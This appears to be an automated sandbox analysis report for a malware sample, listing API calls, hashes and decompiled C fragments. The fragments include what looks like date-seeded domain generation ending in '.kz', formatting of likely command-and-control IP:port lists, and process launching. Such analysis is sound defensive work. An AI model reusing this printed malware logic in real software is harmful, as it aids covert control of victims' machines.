                                                                                                                                                                                                                                                                                                        0x024e93f0
                                                                                                                                                                                                                                                                                                        0x024e933a
                                                                                                                                                                                                                                                                                                        0x024e933a
                                                                                                                                                                                                                                                                                                        0x024e933d
                                                                                                                                                                                                                                                                                                        0x024e93fe

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 024E9308
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: GetLastError.KERNEL32 ref: 024E8C09
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1
                                                                                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,.kz), ref: 024E93DB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                                                        • String ID: .kz
                                                                                                                                                                                                                                                                                                        • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                                                        • Opcode ID: ac225c64d1b27d0444be886e01c8b918c966b40233b73283b2aef6790ad96559
                                                                                                                                                                                                                                                                                                        • Instruction ID: 48bafea023886e49cca7c309d95182fbca5624fd8c47e7d5a8432951e698e991
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac225c64d1b27d0444be886e01c8b918c966b40233b73283b2aef6790ad96559
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74312DB1D00209EBEF08DF95C885BEEB7B5EF58305F10845AE516A7380E778AA85CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                        • API String ID: 4179344489-336475711
                                                                                                                                                                                                                                                                                                        • Opcode ID: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7f2bcc72b8dabd0ea27cf558def7b07d1e8a971bd1b24fbec1df22c7a9c3dfa5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E2153F07083019FD714AF25E54529ABBE0BF84348F45C82EE4C98B346D7B898C5CB8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 4179344489-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb42ebfda6e5f1041a8337c8b64236a6e2dcba6debdfecdf6c0171dcc16b8b9a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE213DB06092559FC714EF25E59425ABBE0BBD0348F45882EE4894B351D7B898C9CB8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                                        			E024E78D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                                                        						_t31 = E024E7B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                                                                                                                                                        						L024EB1EC();
                                                                                                                                                                                                                                                                                                        						_v20 = _t31;
                                                                                                                                                                                                                                                                                                        						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x024e78d6
                                                                                                                                                                                                                                                                                                        0x024e78de
                                                                                                                                                                                                                                                                                                        0x024e78f8
                                                                                                                                                                                                                                                                                                        0x024e790a
                                                                                                                                                                                                                                                                                                        0x024e7922
                                                                                                                                                                                                                                                                                                        0x024e792d
                                                                                                                                                                                                                                                                                                        0x024e792e
                                                                                                                                                                                                                                                                                                        0x024e7933
                                                                                                                                                                                                                                                                                                        0x024e795a
                                                                                                                                                                                                                                                                                                        0x024e7960
                                                                                                                                                                                                                                                                                                        0x024e7907
                                                                                                                                                                                                                                                                                                        0x024e7907
                                                                                                                                                                                                                                                                                                        0x024e7965
                                                                                                                                                                                                                                                                                                        0x024e7965
                                                                                                                                                                                                                                                                                                        0x024e796f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s:%u
                                                                                                                                                                                                                                                                                                        • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9601981735f34f9a8ee47ccb3e62b368826e22bed14fd57f89934b032640516d
                                                                                                                                                                                                                                                                                                        • Instruction ID: ea643ca2fd1bcc312cc1e6a09678e8088705fb4874f19c210934a142becba509
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9601981735f34f9a8ee47ccb3e62b368826e22bed14fd57f89934b032640516d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E118E71D04208EBFF04CF94C984BAEBBB5EF24319F00868EE916AA380D335E645CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2671b0a13e0022686a5f159adedc0d204adf9fcc5b257b9fc773f72bb2b13b5b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22739cb87aa6bf5ec0b8609a5980fe21be2e206d39622b15aafff76b155d4342
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD12BB0604306DFD720EF25D54435BBBE0AF80344F50883EE9859B361D7BD998ADB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E1E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					E024E7D20(E024E7D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                                        					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                                        					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                                        						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                                                        						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                                                                        0x024e1e66
                                                                                                                                                                                                                                                                                                        0x024e1e71
                                                                                                                                                                                                                                                                                                        0x024e1e8b
                                                                                                                                                                                                                                                                                                        0x024e1e93
                                                                                                                                                                                                                                                                                                        0x024e1ebc
                                                                                                                                                                                                                                                                                                        0x024e1ec2
                                                                                                                                                                                                                                                                                                        0x024e1ecb
                                                                                                                                                                                                                                                                                                        0x024e1ecb
                                                                                                                                                                                                                                                                                                        0x024e1ebc
                                                                                                                                                                                                                                                                                                        0x024e1ed4

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 024E1EB4
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 024E1EC2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7fed17b526897181abf2820413deb7b50ff0f8853222db3e75a3eae1b4f868f0
                                                                                                                                                                                                                                                                                                        • Instruction ID: bd0876565d658c7f31662f555e5658017957f01ab8ecaeaf096241c8d74d616e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fed17b526897181abf2820413deb7b50ff0f8853222db3e75a3eae1b4f868f0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43016275A4030CABEF10DBD4DC45FEE77B9AB04705F044559F6096B2C0D7B09A04CBA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                        			E00416BA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				signed int* _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                                                                                                                        				signed int* _t35;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t62;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t60 = _a4;
                                                                                                                                                                                                                                                                                                        				_t45 =  *_t60;
                                                                                                                                                                                                                                                                                                        				_t59 = _t45 + 0x14;
                                                                                                                                                                                                                                                                                                        				 *_t61 = _t59;
                                                                                                                                                                                                                                                                                                        				EnterCriticalSection(??);
                                                                                                                                                                                                                                                                                                        				_t32 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                                                                                        				_t62 = _t61 - 4;
                                                                                                                                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        					_t33 =  *((intOrPtr*)(_t45 + 0x10));
                                                                                                                                                                                                                                                                                                        					if(_t33 == 0x3ffffffe) {
                                                                                                                                                                                                                                                                                                        						_t34 = _t45 + 0x60;
                                                                                                                                                                                                                                                                                                        						_v32 = _t34;
                                                                                                                                                                                                                                                                                                        						_t35 = _t45 + 0x48;
                                                                                                                                                                                                                                                                                                        						_v36 = _t35;
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x10)) = 0x3fffffff;
                                                                                                                                                                                                                                                                                                        						_v40 = _t34;
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t35;
                                                                                                                                                                                                                                                                                                        						_t37 = E00416590( *((intOrPtr*)(_t45 + 0x68)), 0xffffffff, 1);
                                                                                                                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        							L13:
                                                                                                                                                                                                                                                                                                        							_v32 = _t37;
                                                                                                                                                                                                                                                                                                        							 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        							LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        							_t38 = _v32;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 8)) -  *((intOrPtr*)(_t45 + 0x10));
                                                                                                                                                                                                                                                                                                        							 *_t62 = _v32;
                                                                                                                                                                                                                                                                                                        							_t37 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _v36, 1);
                                                                                                                                                                                                                                                                                                        							if(_t37 != 0) {
                                                                                                                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(_t45 + 0x10)) = 0;
                                                                                                                                                                                                                                                                                                        								goto L9;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						 *((intOrPtr*)(_t45 + 0x10)) = _t33 + 1;
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        						_t64 = _t62 - 4;
                                                                                                                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v32 = _t32;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t45 + 0xc)) = _t32 - 1;
                                                                                                                                                                                                                                                                                                        					 *_t62 = _t59;
                                                                                                                                                                                                                                                                                                        					LeaveCriticalSection(??);
                                                                                                                                                                                                                                                                                                        					_t64 = _t62 - 4;
                                                                                                                                                                                                                                                                                                        					if(_v32 != 1) {
                                                                                                                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                                                                                                                        						 *_t64 =  *((intOrPtr*)(_t60 + 4));
                                                                                                                                                                                                                                                                                                        						_t38 = E00413FD0();
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							goto L5;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						 *_t64 = _t45 + 0x60;
                                                                                                                                                                                                                                                                                                        						_t38 = E00415CC0( *((intOrPtr*)(_t45 + 0x68)), _t45 + 0x48, 1);
                                                                                                                                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                                        							L5:
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t60 + 8)))) = _t38;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t38;
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x00416ba9
                                                                                                                                                                                                                                                                                                        0x00416bac
                                                                                                                                                                                                                                                                                                        0x00416bae
                                                                                                                                                                                                                                                                                                        0x00416bb1
                                                                                                                                                                                                                                                                                                        0x00416bb4
                                                                                                                                                                                                                                                                                                        0x00416bba
                                                                                                                                                                                                                                                                                                        0x00416bbd
                                                                                                                                                                                                                                                                                                        0x00416bc2
                                                                                                                                                                                                                                                                                                        0x00416c20
                                                                                                                                                                                                                                                                                                        0x00416c28
                                                                                                                                                                                                                                                                                                        0x00416c40
                                                                                                                                                                                                                                                                                                        0x00416c45
                                                                                                                                                                                                                                                                                                        0x00416c48
                                                                                                                                                                                                                                                                                                        0x00416c4d
                                                                                                                                                                                                                                                                                                        0x00416c53
                                                                                                                                                                                                                                                                                                        0x00416c5a
                                                                                                                                                                                                                                                                                                        0x00416c63
                                                                                                                                                                                                                                                                                                        0x00416c6b
                                                                                                                                                                                                                                                                                                        0x00416c72
                                                                                                                                                                                                                                                                                                        0x00416ca0
                                                                                                                                                                                                                                                                                                        0x00416ca0
                                                                                                                                                                                                                                                                                                        0x00416ca3
                                                                                                                                                                                                                                                                                                        0x00416ca6
                                                                                                                                                                                                                                                                                                        0x00416caf
                                                                                                                                                                                                                                                                                                        0x00416cb2
                                                                                                                                                                                                                                                                                                        0x00416c74
                                                                                                                                                                                                                                                                                                        0x00416c7f
                                                                                                                                                                                                                                                                                                        0x00416c85
                                                                                                                                                                                                                                                                                                        0x00416c8b
                                                                                                                                                                                                                                                                                                        0x00416c92
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c94
                                                                                                                                                                                                                                                                                                        0x00416c92
                                                                                                                                                                                                                                                                                                        0x00416c2a
                                                                                                                                                                                                                                                                                                        0x00416c2d
                                                                                                                                                                                                                                                                                                        0x00416c30
                                                                                                                                                                                                                                                                                                        0x00416c30
                                                                                                                                                                                                                                                                                                        0x00416c33
                                                                                                                                                                                                                                                                                                        0x00416c39
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00416c39
                                                                                                                                                                                                                                                                                                        0x00416bc4
                                                                                                                                                                                                                                                                                                        0x00416bc7
                                                                                                                                                                                                                                                                                                        0x00416bca
                                                                                                                                                                                                                                                                                                        0x00416bcd
